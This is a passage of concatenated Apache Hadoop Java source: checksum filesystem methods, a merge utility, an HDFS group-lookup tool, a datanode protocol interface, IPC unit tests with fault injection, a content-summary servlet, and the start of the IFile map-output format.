public FSDataOutputStream create(Path f, FsPermission permission,
boolean overwrite, int bufferSize, short replication, long blockSize,
Progressable progress) throws IOException {
return create(f, permission, overwrite, true, bufferSize,
replication, blockSize, progress);
}
private FSDataOutputStream create(Path f, FsPermission permission,
boolean overwrite, boolean createParent, int bufferSize,
short replication, long blockSize,
Progressable progress) throws IOException {
Path parent = f.getParent();
if (parent != null) {
if (!createParent && !exists(parent)) {
throw new FileNotFoundException("Parent directory doesn't exist: "
+ parent);
} else if (!mkdirs(parent)) {
throw new IOException("Mkdirs failed to create " + parent);
}
}
final FSDataOutputStream out = new FSDataOutputStream(
new ChecksumFSOutputSummer(this, f, overwrite, bufferSize, replication,
blockSize, progress), null);
if (permission != null) {
setPermission(f, permission);
}
return out;
}
/** {@inheritDoc} */
@Override
public FSDataOutputStream createNonRecursive(Path f, FsPermission permission,
boolean overwrite, int bufferSize, short replication, long blockSize,
Progressable progress) throws IOException {
return create(f, permission, overwrite, false, bufferSize, replication,
blockSize, progress);
}
/**
* Set replication for an existing file.
* Implement the abstract <tt>setReplication</tt> of <tt>FileSystem</tt>
* @param src file name
* @param replication new replication
* @throws IOException
* @return true if successful;
* false if file does not exist or is a directory
*/
public boolean setReplication(Path src, short replication) throws IOException {
boolean value = fs.setReplication(src, replication);
if (!value)
return false;
Path checkFile = getChecksumFile(src);
if (exists(checkFile))
fs.setReplication(checkFile, replication);
return true;
}
/**
* Rename files/dirs
*/
public boolean rename(Path src, Path dst) throws IOException {
if (fs.isDirectory(src)) {
return fs.rename(src, dst);
} else {
boolean value = fs.rename(src, dst);
if (!value)
return false;
Path checkFile = getChecksumFile(src);
if (fs.exists(checkFile)) { //try to rename checksum
if (fs.isDirectory(dst)) {
value = fs.rename(checkFile, dst);
} else {
value = fs.rename(checkFile, getChecksumFile(dst));
}
}
return value;
}
}
/**
* Implement the delete(Path, boolean) in checksum
* file system.
*/
public boolean delete(Path f, boolean recursive) throws IOException{
FileStatus fstatus = null;
try {
fstatus = fs.getFileStatus(f);
} catch(FileNotFoundException e) {
return false;
}
if(fstatus.isDir()) {
//this works since the crcs are in the same
//directories as the files, so we just delete
//everything in the underlying filesystem
return fs.delete(f, recursive);
} else {
Path checkFile = getChecksumFile(f);
if (fs.exists(checkFile)) {
fs.delete(checkFile, true);
}
return fs.delete(f, true);
}
}
final private static PathFilter DEFAULT_FILTER = new PathFilter() {
public boolean accept(Path file) {
return !isChecksumFile(file);
}
};
/**
* List the statuses of the files/directories in the given path if the path is
* a directory.
*
* @param f
* given path
* @return the statuses of the files/directories in the given path
* @throws IOException
*/
@Override
public FileStatus[] listStatus(Path f) throws IOException {
return fs.listStatus(f, DEFAULT_FILTER);
}
@Override
public boolean mkdirs(Path f) throws IOException {
return fs.mkdirs(f);
}
@Override
public void copyFromLocalFile(boolean delSrc, Path src, Path dst)
throws IOException {
Configuration conf = getConf();
FileUtil.copy(getLocal(conf), src, this, dst, delSrc, conf);
}
/**
* The src file is under this filesystem, and the dst is on the local disk.
* Copy it from the filesystem to the local dst path.
*/
@Override
public void copyToLocalFile(boolean delSrc, Path src, Path dst)
throws IOException {
Configuration conf = getConf();
FileUtil.copy(this, src, getLocal(conf), dst, delSrc, conf);
}
/**
* The src file is under this filesystem, and the dst is on the local disk.
* Copy it from the filesystem to the local dst path.
* If src and dst are directories, the copyCrc parameter
* determines whether to copy CRC files.
*/
public void copyToLocalFile(Path src, Path dst, boolean copyCrc)
throws IOException {
if (!fs.isDirectory(src)) { // source is a file
fs.copyToLocalFile(src, dst);
FileSystem localFs = getLocal(getConf()).getRawFileSystem();
if (localFs.isDirectory(dst)) {
dst = new Path(dst, src.getName());
}
dst = getChecksumFile(dst);
if (localFs.exists(dst)) { //remove old local checksum file
localFs.delete(dst, true);
}
Path checksumFile = getChecksumFile(src);
if (copyCrc && fs.exists(checksumFile)) { //copy checksum file
fs.copyToLocalFile(checksumFile, dst);
}
} else {
FileStatus[] srcs = listStatus(src);
for (FileStatus srcFile : srcs) {
copyToLocalFile(srcFile.getPath(),
new Path(dst, srcFile.getPath().getName()), copyCrc);
}
}
}
@Override
public Path startLocalOutput(Path fsOutputFile, Path tmpLocalFile)
throws IOException {
return tmpLocalFile;
}
@Override
public void completeLocalOutput(Path fsOutputFile, Path tmpLocalFile)
throws IOException {
moveFromLocalFile(tmpLocalFile, fsOutputFile);
}
/**
* Report a checksum error to the file system.
* @param f the file name containing the error
* @param in the stream open on the file
* @param inPos the position of the beginning of the bad data in the file
* @param sums the stream open on the checksum file
* @param sumsPos the position of the beginning of the bad data in the checksum file
* @return true if a retry is necessary
*/
public boolean reportChecksumFailure(Path f, FSDataInputStream in,
long inPos, FSDataInputStream sums, long sumsPos) {
return false;
}
}
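// Usage sketch (illustrative; the path is hypothetical). LocalFileSystem is a
// concrete ChecksumFileSystem, so writing through it produces a hidden sibling
// ".<name>.crc" file, and reads verify the CRCs unless verification is disabled:
//
//   Configuration conf = new Configuration();
//   ChecksumFileSystem fs = FileSystem.getLocal(conf);
//   Path data = new Path("/tmp/example.txt");
//   FSDataOutputStream out = fs.create(data);
//   out.writeBytes("hello");
//   out.close();
//   Path crc = fs.getChecksumFile(data);   // /tmp/.example.txt.crc
//   fs.setVerifyChecksum(false);           // subsequent opens skip CRC checks
//   FSDataInputStream in = fs.open(data);
//   in.close();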
<|start_filename|>src/mapred/org/apache/hadoop/mapred/ConcatenateMerger.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.IOException;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.mapred.IFile.IStreamWriter;
import org.apache.hadoop.util.Progressable;
public class ConcatenateMerger<K, V>
{
private static final Log LOG = LogFactory.getLog(ConcatenateMerger.class);
public static <K extends Object, V extends Object> void writeFile(IStreamWriter writer,
List<Segment<K, V>> segments, Progressable progressable, Counters.Counter readsCounter,
Configuration conf) throws IOException
{
if (LOG.isDebugEnabled())
{
StringBuilder sb = new StringBuilder();
sb.append(" Merging " + segments.size() + " files :[");
for (Segment<K, V> segment : segments)
{
sb.append(" Compressed Length: " + segment.getLength() + ","
+ "Uncompressed Lenghth :" + segment.getRawLen() + ";");
}
sb.append("]");
LOG.debug(sb.toString());
}
for (int i = 0; i < segments.size(); i++)
{
Segment<K, V> segment = segments.get(i);
segment.init(readsCounter);
segment.writeTo(writer, progressable, conf);
segment.close();
}
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/tools/GetGroups.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.tools;
import java.io.IOException;
import java.io.PrintStream;
import java.net.InetSocketAddress;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.server.namenode.NameNode;
import org.apache.hadoop.tools.GetGroupsBase;
import org.apache.hadoop.util.ToolRunner;
/**
* HDFS implementation of a tool for getting the groups which a given user
* belongs to.
*/
public class GetGroups extends GetGroupsBase {
static {
Configuration.addDefaultResource("hdfs-default.xml");
Configuration.addDefaultResource("hdfs-site.xml");
}
GetGroups(Configuration conf) {
super(conf);
}
GetGroups(Configuration conf, PrintStream out) {
super(conf, out);
}
@Override
protected InetSocketAddress getProtocolAddress(Configuration conf)
throws IOException {
return NameNode.getAddress(conf);
}
public static void main(String[] argv) throws Exception {
int res = ToolRunner.run(new GetGroups(new Configuration()), argv);
System.exit(res);
}
}
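// Usage sketch (hypothetical invocation): run from the command line via
//   bin/hadoop org.apache.hadoop.hdfs.tools.GetGroups alice bob
// which, assuming GetGroupsBase resolves each argument as a user name against
// the NameNode address returned above, prints one "user : group1 group2 ..."
// line per user.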
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/protocol/ClientDatanodeProtocol.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.protocol;
import java.io.IOException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.hdfs.DFSConfigKeys;
import org.apache.hadoop.hdfs.security.token.block.BlockTokenIdentifier;
import org.apache.hadoop.hdfs.security.token.block.BlockTokenSelector;
import org.apache.hadoop.ipc.VersionedProtocol;
import org.apache.hadoop.security.KerberosInfo;
import org.apache.hadoop.security.token.Token;
import org.apache.hadoop.security.token.TokenInfo;
/** A client-datanode protocol for block recovery
*/
@KerberosInfo(
serverPrincipal = DFSConfigKeys.DFS_DATANODE_USER_NAME_KEY)
@TokenInfo(BlockTokenSelector.class)
public interface ClientDatanodeProtocol extends VersionedProtocol {
public static final Log LOG = LogFactory.getLog(ClientDatanodeProtocol.class);
/**
* 4: added getBlockInfo
* 5: never return null and always return a newly generated access token
*/
public static final long versionID = 5L;
/** Start generation-stamp recovery for specified block
* @param block the specified block
* @param keepLength keep the block length
* @param targets the list of possible locations of specified block
* @return either a new generation stamp, or the original generation stamp.
* Regardless of whether a new generation stamp is returned, a newly
* generated access token is returned as part of the return value.
* @throws IOException
*/
LocatedBlock recoverBlock(Block block, boolean keepLength,
DatanodeInfo[] targets) throws IOException;
/** Returns a block object that contains the specified block object
* from the specified Datanode.
* @param block the specified block
* @return the Block object from the specified Datanode
* @throws IOException if the block does not exist
*/
Block getBlockInfo(Block block) throws IOException;
/**
* Retrieves the path names of the block file and metadata file stored on the
* local file system.
*
* In order for this method to work, one of the following should be satisfied:
* <ul>
* <li>
* The client user must be configured at the datanode to be able to use this
* method.</li>
* <li>
* When security is enabled, kerberos authentication must be used to connect
* to the datanode.</li>
* </ul>
*
* @param block
* the specified block on the local datanode
* @param token
* the block access token.
* @return the BlockLocalPathInfo of a block
* @throws IOException
* on error
*/
BlockLocalPathInfo getBlockLocalPathInfo(Block block,
Token<BlockTokenIdentifier> token) throws IOException;
}
<|start_filename|>src/test/org/apache/hadoop/ipc/TestIPC.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.ipc;
import org.apache.commons.logging.*;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.io.LongWritable;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.net.NetUtils;
import java.util.Random;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.SocketTimeoutException;
import java.net.Socket;
import javax.net.SocketFactory;
import org.junit.Test;
import org.mockito.Mockito;
import org.mockito.invocation.InvocationOnMock;
import org.mockito.stubbing.Answer;
import static org.junit.Assert.*;
import static org.mockito.Mockito.*;
import org.apache.hadoop.conf.Configuration;
/** Unit tests for IPC. */
public class TestIPC {
public static final Log LOG =
LogFactory.getLog(TestIPC.class);
final private static Configuration conf = new Configuration();
final static private int PING_INTERVAL = 1000;
final static private int MIN_SLEEP_TIME = 1000;
/**
* Flag used to turn off the fault injection behavior
* of the various writables.
**/
static boolean WRITABLE_FAULTS_ENABLED = true;
static int WRITABLE_FAULTS_SLEEP = 0;
static {
Client.setPingInterval(conf, PING_INTERVAL);
}
private static final Random RANDOM = new Random();
private static final String ADDRESS = "0.0.0.0";
private static class TestServer extends Server {
private boolean sleep;
private Class<? extends Writable> responseClass;
public TestServer(int handlerCount, boolean sleep) throws IOException {
this(handlerCount, sleep, LongWritable.class, null);
}
public TestServer(int handlerCount, boolean sleep,
Class<? extends Writable> paramClass,
Class<? extends Writable> responseClass)
throws IOException {
super(ADDRESS, 0, paramClass, handlerCount, conf);
this.sleep = sleep;
this.responseClass = responseClass;
}
@Override
public Writable call(Class<?> protocol, Writable param, long receiveTime)
throws IOException {
if (sleep) {
try {
Thread.sleep(RANDOM.nextInt(PING_INTERVAL) + MIN_SLEEP_TIME); // sleep a bit
} catch (InterruptedException e) {}
}
if (responseClass != null) {
try {
return responseClass.newInstance();
} catch (Exception e) {
throw new RuntimeException(e);
}
} else {
return param; // echo param as result
}
}
}
private static class SerialCaller extends Thread {
private Client client;
private InetSocketAddress server;
private int count;
private boolean failed;
public SerialCaller(Client client, InetSocketAddress server, int count) {
this.client = client;
this.server = server;
this.count = count;
}
public void run() {
for (int i = 0; i < count; i++) {
try {
LongWritable param = new LongWritable(RANDOM.nextLong());
LongWritable value =
(LongWritable)client.call(param, server, null, null, 0);
if (!param.equals(value)) {
LOG.fatal("Call failed!");
failed = true;
break;
}
} catch (Exception e) {
LOG.fatal("Caught: " + StringUtils.stringifyException(e));
failed = true;
}
}
}
}
private static class ParallelCaller extends Thread {
private Client client;
private int count;
private InetSocketAddress[] addresses;
private boolean failed;
public ParallelCaller(Client client, InetSocketAddress[] addresses,
int count) {
this.client = client;
this.addresses = addresses;
this.count = count;
}
public void run() {
for (int i = 0; i < count; i++) {
try {
Writable[] params = new Writable[addresses.length];
for (int j = 0; j < addresses.length; j++)
params[j] = new LongWritable(RANDOM.nextLong());
Writable[] values = client.call(params, addresses, null, null, conf);
for (int j = 0; j < addresses.length; j++) {
if (!params[j].equals(values[j])) {
LOG.fatal("Call failed!");
failed = true;
break;
}
}
} catch (Exception e) {
LOG.fatal("Caught: " + StringUtils.stringifyException(e));
failed = true;
}
}
}
}
@Test
public void testSerial() throws Exception {
testSerial(3, false, 2, 5, 100);
testSerial(3, true, 2, 5, 10);
}
public void testSerial(int handlerCount, boolean handlerSleep,
int clientCount, int callerCount, int callCount)
throws Exception {
Server server = new TestServer(handlerCount, handlerSleep);
InetSocketAddress addr = NetUtils.getConnectAddress(server);
server.start();
Client[] clients = new Client[clientCount];
for (int i = 0; i < clientCount; i++) {
clients[i] = new Client(LongWritable.class, conf);
}
SerialCaller[] callers = new SerialCaller[callerCount];
for (int i = 0; i < callerCount; i++) {
callers[i] = new SerialCaller(clients[i%clientCount], addr, callCount);
callers[i].start();
}
for (int i = 0; i < callerCount; i++) {
callers[i].join();
assertFalse(callers[i].failed);
}
for (int i = 0; i < clientCount; i++) {
clients[i].stop();
}
server.stop();
}
@Test
public void testParallel() throws Exception {
testParallel(10, false, 2, 4, 2, 4, 100);
}
public void testParallel(int handlerCount, boolean handlerSleep,
int serverCount, int addressCount,
int clientCount, int callerCount, int callCount)
throws Exception {
Server[] servers = new Server[serverCount];
for (int i = 0; i < serverCount; i++) {
servers[i] = new TestServer(handlerCount, handlerSleep);
servers[i].start();
}
InetSocketAddress[] addresses = new InetSocketAddress[addressCount];
for (int i = 0; i < addressCount; i++) {
addresses[i] = NetUtils.getConnectAddress(servers[i%serverCount]);
}
Client[] clients = new Client[clientCount];
for (int i = 0; i < clientCount; i++) {
clients[i] = new Client(LongWritable.class, conf);
}
ParallelCaller[] callers = new ParallelCaller[callerCount];
for (int i = 0; i < callerCount; i++) {
callers[i] =
new ParallelCaller(clients[i%clientCount], addresses, callCount);
callers[i].start();
}
for (int i = 0; i < callerCount; i++) {
callers[i].join();
assertFalse(callers[i].failed);
}
for (int i = 0; i < clientCount; i++) {
clients[i].stop();
}
for (int i = 0; i < serverCount; i++) {
servers[i].stop();
}
}
@Test
public void testStandAloneClient() throws Exception {
testParallel(10, false, 2, 4, 2, 4, 100);
Client client = new Client(LongWritable.class, conf);
InetSocketAddress address = new InetSocketAddress("127.0.0.1", 10);
try {
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0, conf);
fail("Expected an exception to have been thrown");
} catch (IOException e) {
String message = e.getMessage();
String addressText = address.toString();
assertTrue("Did not find "+addressText+" in "+message,
message.contains(addressText));
Throwable cause=e.getCause();
assertNotNull("No nested exception in "+e,cause);
String causeText=cause.getMessage();
assertTrue("Did not find " + causeText + " in " + message,
message.contains(causeText));
}
}
static void maybeThrowIOE() throws IOException {
if (WRITABLE_FAULTS_ENABLED) {
maybeSleep();
throw new IOException("Injected fault");
}
}
static void maybeThrowRTE() {
if (WRITABLE_FAULTS_ENABLED) {
maybeSleep();
throw new RuntimeException("Injected fault");
}
}
private static void maybeSleep() {
if (WRITABLE_FAULTS_SLEEP > 0) {
try {
Thread.sleep(WRITABLE_FAULTS_SLEEP);
} catch (InterruptedException ie) {
}
}
}
@SuppressWarnings("unused")
private static class IOEOnReadWritable extends LongWritable {
public IOEOnReadWritable() {}
public void readFields(DataInput in) throws IOException {
super.readFields(in);
maybeThrowIOE();
}
}
@SuppressWarnings("unused")
private static class RTEOnReadWritable extends LongWritable {
public RTEOnReadWritable() {}
public void readFields(DataInput in) throws IOException {
super.readFields(in);
maybeThrowRTE();
}
}
@SuppressWarnings("unused")
private static class IOEOnWriteWritable extends LongWritable {
public IOEOnWriteWritable() {}
@Override
public void write(DataOutput out) throws IOException {
super.write(out);
maybeThrowIOE();
}
}
@SuppressWarnings("unused")
private static class RTEOnWriteWritable extends LongWritable {
public RTEOnWriteWritable() {}
@Override
public void write(DataOutput out) throws IOException {
super.write(out);
maybeThrowRTE();
}
}
/**
* Generic test case for exceptions thrown at some point in the IPC
* process.
*
* @param clientParamClass - client writes this writable for parameter
* @param serverParamClass - server reads this writable for parameter
* @param serverResponseClass - server writes this writable for response
* @param clientResponseClass - client reads this writable for response
*/
private void doErrorTest(
Class<? extends LongWritable> clientParamClass,
Class<? extends LongWritable> serverParamClass,
Class<? extends LongWritable> serverResponseClass,
Class<? extends LongWritable> clientResponseClass) throws Exception {
// start server
Server server = new TestServer(1, false,
serverParamClass, serverResponseClass);
InetSocketAddress addr = NetUtils.getConnectAddress(server);
server.start();
// start client
WRITABLE_FAULTS_ENABLED = true;
Client client = new Client(clientResponseClass, conf);
try {
LongWritable param = clientParamClass.newInstance();
try {
client.call(param, addr, null, null, 0, conf);
fail("Expected an exception to have been thrown");
} catch (Throwable t) {
assertExceptionContains(t, "Injected fault");
}
// Doing a second call with faults disabled should return fine --
// ie the internal state of the client or server should not be broken
// by the failed call
WRITABLE_FAULTS_ENABLED = false;
client.call(param, addr, null, null, 0, conf);
} finally {
server.stop();
}
}
@Test
public void testIOEOnClientWriteParam() throws Exception {
doErrorTest(IOEOnWriteWritable.class,
LongWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testRTEOnClientWriteParam() throws Exception {
doErrorTest(RTEOnWriteWritable.class,
LongWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testIOEOnServerReadParam() throws Exception {
doErrorTest(LongWritable.class,
IOEOnReadWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testRTEOnServerReadParam() throws Exception {
doErrorTest(LongWritable.class,
RTEOnReadWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testIOEOnServerWriteResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
IOEOnWriteWritable.class,
LongWritable.class);
}
@Test
public void testRTEOnServerWriteResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
RTEOnWriteWritable.class,
LongWritable.class);
}
@Test
public void testIOEOnClientReadResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
LongWritable.class,
IOEOnReadWritable.class);
}
@Test
public void testRTEOnClientReadResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
LongWritable.class,
RTEOnReadWritable.class);
}
/**
* Test case that fails a write, but only after taking enough time
* that a ping should have been sent. This is a reproducer for a
* deadlock seen in one iteration of HADOOP-6762.
*/
@Test
public void testIOEOnWriteAfterPingClient() throws Exception {
// start server
Client.setPingInterval(conf, 100);
try {
WRITABLE_FAULTS_SLEEP = 1000;
doErrorTest(IOEOnWriteWritable.class,
LongWritable.class,
LongWritable.class,
LongWritable.class);
} finally {
WRITABLE_FAULTS_SLEEP = 0;
}
}
private static void assertExceptionContains(
Throwable t, String substring) {
String msg = StringUtils.stringifyException(t);
assertTrue("Exception should contain substring '" + substring + "':\n" +
msg, msg.contains(substring));
LOG.info("Got expected exception", t);
}
/**
* Test that, if the socket factory throws an IOE, it properly propagates
* to the client.
*/
@Test
public void testSocketFactoryException() throws Exception {
SocketFactory mockFactory = mock(SocketFactory.class);
doThrow(new IOException("Injected fault")).when(mockFactory).createSocket();
Client client = new Client(LongWritable.class, conf, mockFactory);
InetSocketAddress address = new InetSocketAddress("127.0.0.1", 10);
try {
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0);
fail("Expected an exception to have been thrown");
} catch (IOException e) {
assertTrue(e.getMessage().contains("Injected fault"));
}
}
/**
* Test that, if a RuntimeException is thrown after creating a socket
* but before successfully connecting to the IPC server, that the
* failure is handled properly. This is a regression test for
* HADOOP-7428.
*/
@Test
public void testRTEDuringConnectionSetup() throws Exception {
// Set up a socket factory which returns sockets which
// throw an RTE when setSoTimeout is called.
SocketFactory spyFactory = spy(NetUtils.getDefaultSocketFactory(conf));
Mockito.doAnswer(new Answer<Socket>() {
@Override
public Socket answer(InvocationOnMock invocation) throws Throwable {
Socket s = spy((Socket)invocation.callRealMethod());
doThrow(new RuntimeException("Injected fault")).when(s)
.setSoTimeout(anyInt());
return s;
}
}).when(spyFactory).createSocket();
Server server = new TestServer(1, true);
server.start();
try {
// Call should fail due to injected exception.
InetSocketAddress address = NetUtils.getConnectAddress(server);
Client client = new Client(LongWritable.class, conf, spyFactory);
try {
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0, conf);
fail("Expected an exception to have been thrown");
} catch (Exception e) {
LOG.info("caught expected exception", e);
assertTrue(StringUtils.stringifyException(e).contains(
"Injected fault"));
}
// Resetting to the normal socket behavior should succeed
// (i.e. it should not have cached a half-constructed connection)
Mockito.reset(spyFactory);
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0, conf);
} finally {
server.stop();
}
}
@Test
public void testIpcTimeout() throws Exception {
// start server
Server server = new TestServer(1, true);
InetSocketAddress addr = NetUtils.getConnectAddress(server);
server.start();
// start client
Client client = new Client(LongWritable.class, conf);
// set timeout to be less than MIN_SLEEP_TIME
try {
client.call(new LongWritable(RANDOM.nextLong()),
addr, null, null, MIN_SLEEP_TIME/2);
fail("Expected an exception to have been thrown");
} catch (SocketTimeoutException e) {
LOG.info("Get a SocketTimeoutException ", e);
}
// set timeout to be bigger than 3*ping interval
client.call(new LongWritable(RANDOM.nextLong()),
addr, null, null, 3*PING_INTERVAL+MIN_SLEEP_TIME);
}
public static void main(String[] args) throws Exception {
//new TestIPC().testSerial(5, false, 2, 10, 1000);
new TestIPC().testParallel(10, false, 2, 4, 2, 4, 1000);
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/server/namenode/ContentSummaryServlet.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import java.io.IOException;
import java.io.PrintWriter;
import java.security.PrivilegedExceptionAction;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.ContentSummary;
import org.apache.hadoop.hdfs.protocol.ClientProtocol;
import org.apache.hadoop.ipc.RemoteException;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.util.ServletUtil;
import org.znerd.xmlenc.XMLOutputter;
/** Servlet that returns the content summary of a path */
public class ContentSummaryServlet extends DfsServlet {
/** For java.io.Serializable */
private static final long serialVersionUID = 1L;
/** {@inheritDoc} */
public void doGet(final HttpServletRequest request,
final HttpServletResponse response) throws ServletException, IOException {
final Configuration conf =
(Configuration) getServletContext().getAttribute(JspHelper.CURRENT_CONF);
final UserGroupInformation ugi = getUGI(request, conf);
try {
ugi.doAs(new PrivilegedExceptionAction<Void>() {
@Override
public Void run() throws Exception {
final String path = ServletUtil.getDecodedPath(request, "/contentSummary");
final PrintWriter out = response.getWriter();
final XMLOutputter xml = new XMLOutputter(out, "UTF-8");
xml.declaration();
try {
//get content summary
final ClientProtocol nnproxy = createNameNodeProxy();
final ContentSummary cs = nnproxy.getContentSummary(path);
//write xml
xml.startTag(ContentSummary.class.getName());
if (cs != null) {
xml.attribute("length" , "" + cs.getLength());
xml.attribute("fileCount" , "" + cs.getFileCount());
xml.attribute("directoryCount", "" + cs.getDirectoryCount());
xml.attribute("quota" , "" + cs.getQuota());
xml.attribute("spaceConsumed" , "" + cs.getSpaceConsumed());
xml.attribute("spaceQuota" , "" + cs.getSpaceQuota());
}
xml.endTag();
} catch(IOException ioe) {
writeXml(ioe, path, xml);
}
xml.endDocument();
return null;
}
});
} catch (InterruptedException e) {
throw new IOException(e);
}
}
}
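// Shape of the XML written above (values are hypothetical): the servlet emits a
// single element named after the ContentSummary class, e.g.
//   <org.apache.hadoop.fs.ContentSummary length="1024" fileCount="3"
//       directoryCount="2" quota="-1" spaceConsumed="3072" spaceQuota="-1"/>
// or, on failure, the exception serialized by writeXml(ioe, path, xml).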
<|start_filename|>src/mapred/org/apache/hadoop/mapred/IFile.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.DataInputStream;
import java.io.EOFException;
import java.io.IOException;
import java.io.InputStream;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.DataOutputBuffer;
import org.apache.hadoop.io.WritableUtils;
import org.apache.hadoop.io.compress.CodecPool;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.io.compress.CompressionOutputStream;
import org.apache.hadoop.io.compress.Compressor;
import org.apache.hadoop.io.compress.Decompressor;
import org.apache.hadoop.io.serializer.SerializationFactory;
import org.apache.hadoop.io.serializer.Serializer;
import org.apache.hadoop.util.Progressable;
/**
* <code>IFile</code> is the simple <key-len, value-len, key, value> format
* for the intermediate map-outputs in Map-Reduce.
*
* There is a <code>Writer</code> to write out map-outputs in this format and
* a <code>Reader</code> to read files of this format.
*/
public class IFile {
private static final Log LOG = LogFactory.getLog(IFile.class);
public static final int EOF_MARKER = -1; // End of File Marker
public static final int LEN_OF_EOF = 2 * WritableUtils
.getVIntSize(IFile.EOF_MARKER);
private static final int MAX_BYTES_TO_READ = 64 * 1024;
/**
* <code>IFile.Writer</code> to write out intermediate map-outputs.
*/
public static class Writer<K extends Object, V extends Object> implements
IStreamWriter, IWriter<K, V> {
FSDataOutputStream out;
boolean ownOutputStream = false;
long start = 0;
FSDataOutputStream rawOut;
CompressionOutputStream compressedOut;
Compressor compressor;
boolean compressOutput = false;
protected long decompressedBytesWritten = 0;
long compressedBytesWritten = 0;
// Count records written to disk
private long numRecordsWritten = 0;
private final Counters.Counter writtenRecordsCounter;
IFileOutputStream checksumOut;
Class<K> keyClass;
Class<V> valueClass;
Serializer<K> keySerializer;
Serializer<V> valueSerializer;
DataOutputBuffer buffer = new DataOutputBuffer();
public Writer(Configuration conf, FileSystem fs, Path file,
Class<K> keyClass, Class<V> valueClass,
CompressionCodec codec,
Counters.Counter writesCounter) throws IOException {
this(conf, fs.create(file), keyClass, valueClass, codec,
writesCounter);
ownOutputStream = true;
}
protected Writer(Counters.Counter writesCounter) {
writtenRecordsCounter = writesCounter;
}
public Writer(Configuration conf, FSDataOutputStream out,
Class<K> keyClass, Class<V> valueClass,
CompressionCodec codec, Counters.Counter writesCounter)
throws IOException {
this.writtenRecordsCounter = writesCounter;
